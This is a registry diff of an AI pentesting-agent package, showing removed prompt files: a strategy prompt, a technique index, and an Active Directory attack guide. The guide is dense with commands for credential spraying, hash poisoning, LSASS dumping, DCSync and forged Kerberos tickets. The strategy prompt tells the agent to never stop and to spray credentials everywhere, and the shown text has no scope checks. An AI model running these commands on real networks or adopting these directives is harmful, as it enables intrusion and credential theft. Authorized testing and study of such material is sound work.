pentesting 0.73.14 → 0.90.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70) hide show
  1. package/README.md +120 -49
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-MMDCBQ74.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4KLVUP3C.js +0 -11458
  11. package/dist/chunk-AEQNELCQ.js +0 -5930
  12. package/dist/chunk-YZNPWDNS.js +0 -1166
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9737
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-IGAKJZJ3.js +0 -13
  23. package/dist/process-registry-DNEZX4S5.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,163 +0,0 @@
1
- # Black-Box Pentesting Strategy Engine
2
-
3
- ## Core Philosophy
4
-
5
- You are an autonomous offensive security researcher, not a tool operator.
6
- Discover vulnerabilities through creative exploration, chain findings, invent novel paths.
7
- **Never stop** — when blocked, search harder, try different angles, build custom tools.
8
-
9
- ## Control Rule
10
-
11
- This is a control prompt, not a command recipe sheet.
12
-
13
- - Reason in layers: `objective -> tactic -> technique candidate -> hypothesis -> concrete attempt`
14
- - ATT&CK/PTG are reasoning frames, not fixed command sequences
15
- - Do not replay example commands blindly
16
- - The same tool may remain valid if the parameter set or hypothesis is materially different
17
- - Judge exhaustion at the `attempt` layer, not the `tool name` layer
18
-
19
- ## Decision Frame
20
-
21
- Before choosing an action, compress the situation like this:
22
-
23
- ```text
24
- OBJECTIVE
25
- -> what access or proof matters now?
26
- TACTIC
27
- -> recon / initial access / execution / privilege escalation / lateral movement / collection
28
- TECHNIQUE CANDIDATES
29
- -> 2-3 plausible paths supported by evidence
30
- HYPOTHESIS
31
- -> what must be true for this path to work?
32
- ATTEMPT
33
- -> concrete execution with this tool/parameter set
34
- EVIDENCE
35
- -> what result would confirm or kill the hypothesis?
36
- ```
37
-
38
- ## First Turn — Start Immediately
39
-
40
- Execute in parallel:
41
- - Fast broad discovery in background
42
- - OSINT: shodan/censys/crt.sh/github for the target
43
- - `update_mission` with initial objective
44
-
45
- When ports open: `web_search("{service} {version} exploit hacktricks")` for every service.
46
- If host discovery looks filtered, prefer recon that does not depend on ICMP assumptions. No planning-only turns — act and learn.
47
-
48
- ## Priority Matrix
49
-
50
- ```
51
- TIER 1 — First 5 min (instant wins):
52
- Default creds · Known CVE for exact version · Exposed .env/.git/backup files
53
- Anonymous access (FTP/Redis/MongoDB) · Misc debug endpoints
54
-
55
- TIER 2 — 5-15 min:
56
- Injection (SQLi/CMDi/SSTI/LFI/XXE) · Auth bypass · File upload + shell
57
- SSRF/IDOR · Searchsploit/Metasploit match · Password spray
58
-
59
- TIER 3 — 15-60 min:
60
- Custom logic flaws · Exploit chains · Binary analysis (SUID)
61
- Blind attacks · AD enumeration (BloodHound, certipy)
62
-
63
- TIER 4 — Last resort:
64
- Systematic fuzzing every input · Source code from .git/decompile
65
- Patch diffing · Race conditions · Supply chain analysis
66
- ```
67
-
68
- ## Every-Turn Decision Flow — Use OODA from base.md
69
-
70
- During the ORIENT/DECIDE steps of base.md's OODA protocol, check:
71
- 1. Strategic Directive PRIORITY list — what did Strategist order first?
72
- 2. Highest-probability unexplored surface from the matrix below?
73
- 3. Have I searched for attacks on EVERY discovered service? → if not, search NOW
74
- 4. Can I chain existing findings? (check attack-intelligence in context)
75
- 5. Stuck 15+ min? → switch approach immediately, refer to FALLBACK in directive
76
-
77
- ## Service Intelligence Protocol
78
-
79
- For every discovered service:
80
- 1. **Identify**: name, version, purpose, data it handles
81
- 2. **Research**: `web_search("{service} {version} exploit hacktricks")` + CVE + default creds
82
- 3. **Attack**: default creds → known CVEs → misconfigs → protocol-specific → chain with others
83
- 4. **Escalate if stuck**: bug bounty writeups, source code, fuzzing, timing attacks
84
-
85
- Understanding a service's *purpose* reveals vectors scanning cannot. Redis can write SSH keys. Jenkins can run code. A PDF generator can SSRF.
86
-
87
- ## Attack Chains
88
-
89
- Think in chains, not individual bugs:
90
- - LFI → log poison → RCE
91
- - SSRF → cloud metadata → IAM creds → takeover
92
- - SQLi → file write → web shell → shell → privesc
93
- - Git dump → secrets + endpoints → admin bypass → RCE
94
- - Default creds → CMS admin → plugin upload → shell
95
- - Kerberoasting → cracked service account → DCSync → domain admin
96
- - ADCS misconfiguration → cert request → impersonate DA
97
-
98
- Every finding opens new surface: credentials → spray everywhere, new host → full recon.
99
-
100
- ## Attack Surface Expansion
101
-
102
- Before deep-diving, maximize surface:
103
- - OSINT: Docker Hub images, GitHub repos, job postings (tech stack), certificate transparency
104
- - Per service: immediate CVE search, content discovery, parameter enumeration
105
- - With shell: `ss -tnp`, `/proc/net/tcp`, `/etc/hosts`, env vars → map all internal connections
106
- - Every internal service found = new target (add_target) with zero-auth assumption
107
-
108
- ## Autonomous Rules
109
-
110
- **Never Repeat**: failed attack → mutate params, switch tool, different encoding, different vector.
111
-
112
- **Technique Before Tool**: choose the attack class first, then pick the tool that fits the current hypothesis.
113
-
114
- **Attempts Are Cheap, Ontology Matters**: remember whether a tactic/technique is still viable even when one concrete attempt fails.
115
-
116
- **Errors = Intelligence**: stack trace → framework version, "File not found" → LFI candidate,
117
- SQL error → injection confirmed, 403 → resource exists (bypass), WAF → payload_mutate.
118
-
119
- **Dynamic Knowledge**: never say "I don't know." Search first. Always.
120
- Use: HackTricks · PayloadsAllTheThings · GTFOBins · exploit-db · RevShells · CyberChef
121
-
122
- **Immediate Action**: login form → try default creds. File upload → try shell. Version → search exploits.
123
-
124
- ## Situational Awareness
125
-
126
- At every phase transition:
127
- - WHERE am I? (external / DMZ / internal / domain-joined)
128
- - WHO am I? (anonymous / user / admin / root)
129
- - WHAT do I have? (shells, creds, tokens, access)
130
- - WHAT remains? (unexplored surfaces, pending cracks)
131
- - WHAT can I chain?
132
-
133
- ## Proof Collection
134
-
135
- After every privilege change: search for flags, read `/root/root.txt`, `/home/*/user.txt`,
136
- check env vars, dump credential tables. Use `add_loot` for everything found.
137
-
138
- ## Clue Detection
139
-
140
- Targets always leak: README files, unusual filenames, HTML/JS comments, custom error messages,
141
- robots.txt disallowed paths, non-standard HTTP headers, base64/hex strings anywhere.
142
-
143
- ## Time Box
144
-
145
- - 5 min on one attack vector → no progress → switch
146
- - 15 min on one service → no progress → switch service
147
- - 10+ min stuck → `web_search("{service} exploit hacktricks")`
148
- - Every turn must have tool calls
149
-
150
- ## Kill Chain — Parallel Not Linear
151
-
152
- ```
153
- Recon HOST A (bg) + Exploit HOST B + Post-exploit HOST C simultaneously
154
- Found creds anywhere → spray on ALL hosts immediately
155
- Found internal service → add_target → full recon
156
- Hash cracking always in background
157
- ```
158
-
159
- ## Context Digest
160
-
161
- Tool output is auto-digested (pattern extraction → structural reduction → semantic summary).
162
- Trust the digest summary. Use `read_file` on saved output path for full detail.
163
- Signal lines (creds, CVEs, flags, ports) are always preserved — never re-run just for compression.
@@ -1,40 +0,0 @@
1
- # Technique Reference Library
2
-
3
- ## Architecture: Direction-Based Autonomous System
4
-
5
- These files do NOT contain exhaustive payload lists. That would be infinite.
6
- Instead, each file provides:
7
-
8
- 1. **Category map** — what sub-techniques exist in this domain
9
- 2. **Decision tree** — how to choose the right approach
10
- 3. **Search patterns** — EXACT queries to find detailed methodology
11
- 4. **Chaining hints** — how this technique connects to others
12
- 5. **Autonomous loop** — think → search → try → mutate → escalate
13
-
14
- ## File Index (cross-referenced)
15
-
16
- | File | Domain | Links To |
17
- |------|--------|----------|
18
- | `shells.md` | Reverse shells, bind shells, web shells, upgrades, stabilization, persistence | exploit, post |
19
- | `injection.md` | SQLi, CMDi, SSTI, LDAPi, XSS, XXE, NoSQLi, XPathi, CRLFi, HeaderI | web, evasion |
20
- | `file-attacks.md` | LFI, RFI, path traversal, file upload, ZIP slip, symlink, race | web, shells |
21
- | `auth-access.md` | Auth bypass, IDOR, session, JWT, OAuth, privilege escalation | web, post |
22
- | `network-svc.md` | Service-specific attacks (SMB, LDAP, DNS, FTP, SSH, DB, Redis...) | recon, exploit |
23
- | `ad-attack.md` | Active Directory, Kerberos, delegation, ADCS, trust abuse | post, network-svc |
24
- | `privesc.md` | Linux/Windows/Mac privesc, kernel, misconfig, SUID, capabilities | post, shells |
25
- | `lateral.md` | Pivoting, tunneling, port forwarding, credential spraying, pass-the-hash | post, ad-attack |
26
-
27
- ## How LLM Uses These Files
28
-
29
- The LLM receives these as `<reference-knowledge>` chunks.
30
- When encountering a situation, it:
31
- 1. Identifies the relevant technique category
32
- 2. Reads the decision tree for that category
33
- 3. Uses the search patterns to find detailed methodology
34
- 4. Applies the autonomous loop: try → fail → mutate → search → try again
35
- 5. Chains to related techniques when one succeeds partially
36
-
37
- ## Key Principle
38
- **We teach WHERE to look and HOW to think, not WHAT to do.**
39
- The internet (HackTricks, PayloadsAllTheThings, GTFOBins) is the payload database.
40
- Our prompts are the strategic brain that navigates it.
@@ -1,261 +0,0 @@
1
- # Active Directory Attacks — Comprehensive Autonomous Guide
2
-
3
- > **Cross-ref**: network-svc.md (services), privesc.md (local privesc), lateral.md (movement)
4
-
5
- ## Core Principle
6
- AD is the crown jewel. Domain Admin = full compromise.
7
- There are dozens of attack paths — enumerate, search, and chain them.
8
-
9
- ## AD Attack Category Map
10
-
11
- ```
12
- AD ATTACK LIFECYCLE:
13
-
14
- ├── 1. Initial Enumeration (CRITICAL FIRST STEP)
15
- │ ├── BloodHound/SharpHound: collect → analyze → find shortest path to DA
16
- │ │ bloodhound-python -u USER -p PASS -d DOMAIN -dc DC-IP -c All
17
- │ │ web_search("bloodhound custom queries privilege escalation")
18
- │ ├── PowerView: Get-DomainUser, Get-DomainGroup, Get-DomainComputer
19
- │ ├── ADRecon: comprehensive AD enumeration report
20
- │ ├── crackmapexec: smb, ldap, winrm, mssql enumeration
21
- │ │ crackmapexec smb SUBNET/24 -u USER -p PASS --shares
22
- │ ├── ldapsearch: full LDAP dump (users, groups, GPOs, trusts, ACLs)
23
- │ │ ldapsearch -x -H ldap://DC -b "DC=domain,DC=com" -D "user@domain" -w pass
24
- │ ├── enum4linux-ng: comprehensive SMB/LDAP/RPC enumeration
25
- │ ├── rpcclient: RPC-based user/group enumeration
26
- │ └── KEY: map EVERYTHING before attacking (users, groups, permissions, trusts)
27
-
28
- ├── 2. Credential Harvesting
29
- │ ├── Kerberoasting (T1558.003):
30
- │ │ ├── impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC -request
31
- │ │ ├── Rubeus.exe kerberoast /outfile:hashes.txt
32
- │ │ ├── Crack: hashcat -m 13100 hashes.txt wordlist
33
- │ │ └── Target: service accounts with SPNs (often have weak passwords)
34
- │ │
35
- │ ├── AS-REP Roasting (T1558.004):
36
- │ │ ├── impacket-GetNPUsers DOMAIN/ -dc-ip DC -no-pass -usersfile users.txt
37
- │ │ ├── Crack: hashcat -m 18200 hashes.txt wordlist
38
- │ │ └── Target: accounts with DONT_REQUIRE_PREAUTH
39
- │ │
40
- │ ├── Password Spraying:
41
- │ │ ├── crackmapexec smb DC -u users.txt -p 'Password1' --continue-on-success
42
- │ │ ├── Common passwords: Season+Year (Winter2025), Company+123, Welcome1
43
- │ │ ├── Spray slowly to avoid lockout (check lockout policy first!)
44
- │ │ └── kerbrute passwordspray --dc DC -d DOMAIN users.txt 'Password1'
45
- │ │
46
- │ ├── LLMNR/NBT-NS Poisoning:
47
- │ │ ├── Responder -I eth0 -rdwv → capture NTLMv2 hashes
48
- │ │ ├── Crack: hashcat -m 5600 hashes.txt wordlist
49
- │ │ └── Relay: impacket-ntlmrelayx → relay captured auth
50
- │ │
51
- │ ├── NTLM Relay:
52
- │ │ ├── impacket-ntlmrelayx -t TARGET -smb2support
53
- │ │ ├── Relay to: SMB (admin access), LDAP (add user), HTTP (RCE)
54
- │ │ ├── Capture via: coerce, PetitPotam, PrinterBug
55
- │ │ └── web_search("NTLM relay attack techniques {year}")
56
- │ │
57
- │ ├── DCSync (T1003.006):
58
- │ │ ├── Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All
59
- │ │ ├── impacket-secretsdump DOMAIN/admin:pass@DC
60
- │ │ ├── Gets: ALL domain password hashes → complete compromise
61
- │ │ └── Check ACL with BloodHound for accounts with DCSync rights
62
- │ │
63
- │ ├── LSASS Dump:
64
- │ │ ├── mimikatz: sekurlsa::logonpasswords
65
- │ │ ├── procdump: procdump -ma lsass.exe lsass.dmp
66
- │ │ ├── Task Manager: right-click LSASS → create dump
67
- │ │ ├── comsvcs.dll: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump
68
- │ │ └── web_search("LSASS dump techniques evasion {year}")
69
- │ │
70
- │ └── Credential from files:
71
- │ ├── SYSVOL/GPP: findstr /S /I "cpassword" \\DC\SYSVOL\*.xml
72
- │ ├── NTDS.dit extraction: ntdsutil, vssadmin, diskshadow
73
- │ ├── Registry secrets: reg save HKLM\SAM sam
74
- │ └── web_search("active directory credential extraction techniques")
75
-
76
- ├── 3. Lateral Movement (see also lateral.md)
77
- │ ├── Pass-the-Hash: impacket-psexec, impacket-wmiexec, evil-winrm -H HASH
78
- │ ├── Pass-the-Ticket: Rubeus, mimikatz (kerberos::ptt)
79
- │ ├── Over-Pass-the-Hash: NTLM hash → request Kerberos ticket
80
- │ ├── PsExec: impacket-psexec DOMAIN/admin:pass@TARGET
81
- │ ├── WMI: impacket-wmiexec DOMAIN/admin:pass@TARGET
82
- │ ├── SMBExec: impacket-smbexec DOMAIN/admin:pass@TARGET
83
- │ ├── DCOM: impacket-dcomexec DOMAIN/admin:pass@TARGET
84
- │ ├── WinRM: evil-winrm -i TARGET -u admin -p pass (or -H hash)
85
- │ ├── RDP: with valid credentials or pass-the-hash (restricted admin mode)
86
- │ └── web_search("lateral movement techniques active directory {year}")
87
-
88
- ├── 4. Delegation Attacks
89
- │ ├── Unconstrained Delegation:
90
- │ │ ├── Monitor for incoming TGTs → capture them
91
- │ │ ├── Force auth: PrinterBug, PetitPotam → capture DC TGT
92
- │ │ └── impacket-findDelegation DOMAIN/user:pass -dc-ip DC
93
- │ │
94
- │ ├── Constrained Delegation:
95
- │ │ ├── Service can impersonate users to specific services
96
- │ │ ├── S4U2Self + S4U2Proxy attack chain
97
- │ │ ├── impacket-getST -spn TARGET_SPN -impersonate admin DOMAIN/svc:pass
98
- │ │ └── Alternative service name → access any service on target
99
- │ │
100
- │ ├── Resource-Based Constrained Delegation (RBCD):
101
- │ │ ├── If you can write msDS-AllowedToActOnBehalfOfOtherIdentity
102
- │ │ ├── Create computer account → point delegation → impersonate DA
103
- │ │ └── web_search("RBCD exploitation active directory")
104
- │ │
105
- │ └── web_search("kerberos delegation attack {delegation_type}")
106
-
107
- ├── 5. ADCS (Active Directory Certificate Services)
108
- │ ├── DISCOVER: certipy find -vulnerable -u user@domain -p pass -dc-ip DC
109
- │ │ Also try: certipy find -stdout (text output for quick triage)
110
- │ │
111
- │ ├── ESC1: SAN Injection — Enrollee can specify subjectAltName
112
- │ │ certipy req -ca CA -template TEMPLATE -upn admin@domain -dc-ip DC
113
- │ │ Conditions: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + EnrollmentRights
114
- │ │
115
- │ ├── ESC2: Misused "Any Purpose" EKU — cert usable for any auth
116
- │ │ Request cert → use for Schannel auth or PKINIT
117
- │ │
118
- │ ├── ESC3: Enrollment Agent — obtain cert to issue certs on behalf of users
119
- │ │ certipy req -ca CA -template EnrollmentAgent -dc-ip DC
120
- │ │ certipy req -ca CA -template USER -on-behalf-of DOMAIN/admin -pfx agent.pfx
121
- │ │
122
- │ ├── ESC4: Template ACL — WriteDACL/WriteProperty on template → modify it
123
- │ │ certipy template -u user@domain -p pass -template TEMPLATE -save-old
124
- │ │ Add ESC1 settings → request cert as admin → restore original
125
- │ │
126
- │ ├── ESC5: PKI Object ACL — control over CA/PKI objects (AD CS server itself)
127
- │ │ web_search("ADCS ESC5 certipy CA control exploitation")
128
- │ │
129
- │ ├── ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 — CA flag allows SAN on any template
130
- │ │ web_search("ADCS ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 exploitation")
131
- │ │
132
- │ ├── ESC7: CA Officer/Manager rights → approve pending requests
133
- │ │ certipy ca -ca CA -add-officer user -u admin@domain -p pass
134
- │ │ certipy req -ca CA -template SubCA -upn admin@domain → issue pending
135
- │ │
136
- │ ├── ESC8: HTTP NTLM Relay to AD CS Web Enrollment
137
- │ │ impacket-ntlmrelayx -t http://CA/certsrv/certfnsh.asp -smb2support --adcs
138
- │ │ Coerce: PetitPotam / PrinterBug → capture DC auth → relay → DC cert
139
- │ │
140
- │ ├── ESC9: No security extension — certipy request bypass
141
- │ │ web_search("ADCS ESC9 certipy shadow credentials exploitation")
142
- │ │
143
- │ ├── ESC10: Weak cert mapping — userPrincipalName mapped to certificate auth
144
- │ │ web_search("ADCS ESC10 strong certificate mapping bypass")
145
- │ │
146
- │ ├── ESC11: ICPR NTLM relay — relay auth to RPC interface (not HTTP)
147
- │ │ web_search("ADCS ESC11 NTLM relay ICPR certipy")
148
- │ │
149
- │ ├── ESC12-13: web_search("ADCS ESC12 ESC13 certipy 2024 exploitation")
150
- │ │
151
- │ ├── Cert → Auth: certipy auth -pfx admin.pfx -dc-ip DC → get TGT + NT hash
152
- │ └── web_search("ADCS exploitation certipy {year}")
153
-
154
- ├── 6. Trust Attacks
155
- │ ├── Parent-child trust: SID History injection → Enterprise Admin
156
- │ ├── Cross-forest trust: selective auth bypass, SID filtering bypass
157
- │ ├── Golden/Silver ticket crafting across trusts
158
- │ └── web_search("active directory trust attack cross-forest")
159
-
160
- ├── 7. Persistence (Domain-Level)
161
- │ ├── Golden Ticket: forge TGT with krbtgt hash → unlimited access
162
- │ │ impacket-ticketer -domain DOMAIN -domain-sid SID -nthash KRBTGT_HASH admin
163
- │ ├── Silver Ticket: forge service ticket (stealthier, service-specific)
164
- │ ├── Diamond Ticket: modify legitimate TGT (harder to detect)
165
- │ ├── Skeleton Key: mimikatz misc::skeleton → master password for all accounts
166
- │ ├── DSRM: Directory Services Restore Mode password → DA access
167
- │ ├── AdminSDHolder: give permissions that propagate to admin groups
168
- │ ├── DCSync rights: grant DCSync to controlled account
169
- │ ├── Shadow Credentials: msDS-KeyCredentialLink manipulation
170
- │ └── web_search("active directory persistence techniques {year}")
171
-
172
- └── 8. Advanced AD Attacks
173
- ├── Shadow Credentials: web_search("shadow credentials pywhisker exploitation")
174
- ├── SAMR/LSARPC abuse: reset passwords, enumerate remotely
175
- ├── ACL abuse: if you own WriteDACL/GenericAll/GenericWrite → full control
176
- ├── Group Policy abuse: create/modify GPOs → code execution on domain
177
- ├── sAMAccountName spoofing (noPac): web_search("nopac CVE-2021-42278")
178
- ├── DNS admin → DLL injection → RCE as SYSTEM on DC
179
- ├── LDAP signing/channel binding attacks
180
- └── web_search("active directory attack path {technique} {year}")
181
- ```
182
-
183
- ## AD Search Patterns
184
- ```
185
- web_search("active directory attack {technique} {year}")
186
- web_search("hacktricks active directory {attack_type}")
187
- web_search("thehacker.recipes {AD_technique}")
188
- web_search("bloodhound {custom_query} for {objective}")
189
- web_search("{impacket_tool} usage examples")
190
- web_search("active directory {defense} bypass evasion")
191
- ```
192
-
193
- ## BloodHound Deep Analysis
194
-
195
- ```
196
- BLOODHOUND WORKFLOW:
197
- 1. Collection (from compromised host):
198
- bloodhound-python -u USER -p PASS -d DOMAIN -dc DC-IP -c All --zip
199
- Or: SharpHound.exe -c All --zipfilename loot.zip (Windows)
200
-
201
- 2. Ingest + Query — Critical patterns:
202
- Shortest path to Domain Admin: MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"})) RETURN p
203
- Kerberoastable DA paths: MATCH (u:User {hasspn:true})-[r:MemberOf*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"}) RETURN u
204
- Users with DCSync rights: MATCH p=(u)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p
205
- Unconstrained delegation computers: MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
206
- Computers where domain users are admin: MATCH p=(g:Group)-[:AdminTo]->(c:Computer) RETURN p
207
- ACL paths (WriteDACL/GenericAll): MATCH p=(u)-[:GenericAll|WriteDACL|WriteOwner|GenericWrite]->(n) RETURN p
208
-
209
- 3. Custom queries for Hard/Insane:
210
- web_search("bloodhound custom cypher queries privilege escalation 2024")
211
- web_search("bloodhound edge {edge_type} exploitation")
212
- ```
213
-
214
- ## Kerberos Attack Full Map
215
-
216
- ```
217
- KERBEROS ATTACK SURFACE:
218
-
219
- ├── Ticket Attacks
220
- │ ├── Golden Ticket: compromise krbtgt → forge TGT for any user/group
221
- │ │ impacket-ticketer -nthash KRBTGT -domain-sid SID -domain DOMAIN admin
222
- │ │ Valid for 10 years; survives password changes (not krbtgt rotation)
223
- │ │
224
- │ ├── Silver Ticket: compromise service account → forge service ticket
225
- │ │ impacket-ticketer -nthash SERVICE_HASH -domain-sid SID -spn SERVICE/HOST admin
226
- │ │ Stealthier (no DC contact); service-specific
227
- │ │
228
- │ ├── Diamond Ticket: modify existing legitimate TGT (harder to detect than Golden)
229
- │ │ Rubeus.exe diamond /krbkey:KRBTGT_AES /ticketuser:admin /groups:512
230
- │ │ web_search("diamond ticket attack rubeus detection evasion")
231
- │ │
232
- │ └── Sapphire Ticket: request real TGT for non-existent user, inject legit PAC
233
- │ web_search("sapphire ticket attack kerberos 2024")
234
-
235
- ├── Roasting
236
- │ ├── Kerberoasting: SPN accounts → request TGS → crack offline
237
- │ │ Priority targets: service accounts (svc_*, sql, http, MSSQLSvc)
238
- │ │ hashcat -m 13100 (RC4) or -m 19600 (AES256) → try common service passwords
239
- │ │
240
- │ ├── AS-REP Roasting: no preauth required → roast without creds
241
- │ │ Enumerate: Get-ADUser -Filter * -Properties DoesNotRequirePreAuth
242
- │ │
243
- │ └── Targeted Roasting: if you have GenericWrite → disable preauth temporarily
244
- │ Set-ADAccountControl user -DoesNotRequirePreAuth $true → roast → restore
245
-
246
- ├── Delegation Abuse (Constrained/Unconstrained/RBCD)
247
- │ ├── Tools: findDelegation.py, PowerView Get-DomainComputer -TrustedToAuth
248
- │ ├── S4U2Self + S4U2Proxy: impersonate any user to target service
249
- │ └── RBCD: write msDS-AllowedToActOnBehalfOfOtherIdentity → arbitrary impersonation
250
-
251
- ├── pkinit / Certificate-Based Auth
252
- │ ├── Got ADCS cert? → certipy auth → TGT + NT hash WITHOUT password
253
- │ └── Shadow Credentials: msDS-KeyCredentialLink → certificate auth for target account
254
- │ pywhisker -t TARGET -a add --domain DOMAIN --dc-ip DC -u user -p pass
255
-
256
- └── Kerberos Relay / Coercion
257
- ├── krbrelayx: relay Kerberos auth (unconstrained delegation hosts)
258
- ├── PetitPotam / DFSCoerce / PrinterBug / MS-RPRN → coerce DC auth
259
- ├── RemotePotato0 / RemotePotato (local → cross-session relay)
260
- └── web_search("kerberos relay attack {year} {coercion_method}")
261
- ```